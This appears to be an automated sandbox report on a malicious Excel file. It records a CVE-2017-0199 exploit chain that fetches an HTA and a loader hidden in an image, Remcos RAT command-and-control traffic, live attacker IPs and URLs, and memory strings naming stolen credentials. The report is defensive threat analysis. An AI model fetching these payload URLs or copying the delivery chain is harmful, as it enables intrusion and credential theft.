Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 107.175.130.20:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 107.175.130.20:14645
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.174.146.46:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.185.65:443 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49175

Uses dynamic DNS services

Source: unknown

DNS query: name: seemebest2024rmc.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49176 -> 107.175.130.20:14645

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.162.95 172.67.162.95
Source: Joe Sandbox View	IP Address: 104.21.74.191 104.21.74.191
Source: Joe Sandbox View	IP Address: 107.175.130.20 107.175.130.20
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49177 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46
Source: unknown	TCP traffic detected without corresponding DNS query: 107.174.146.46

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE899B4B18 URLDownloadToFileW,

5_2_000007FE899B4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"
Source: global traffic	HTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.yahoo.com (Yahoo)
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: acesso.run
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: seemebest2024rmc.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/
Source: mshta.exe, 00000010.00000003.462590642.00000000003C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.460408085.000000000327D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
Source: mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5
Source: mshta.exe, 00000004.00000002.412322987.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.412104448.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;
Source: mshta.exe, 00000004.00000003.409103792.0000000003683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.0000000003683000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:
Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaE
Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaN
Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.0000000000391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaain
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:
Source: mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrain
Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4
Source: mshta.exe, 00000004.00000003.410387499.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.408514038.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463384059.0000000003275000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.461250069.0000000003275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5
Source: mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htal
Source: mshta.exe, 00000004.00000003.409103792.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htant
Source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/picture
Source: powershell.exe, 00000012.00000002.477548914.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B216000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF
Source: powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:
Source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFp
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
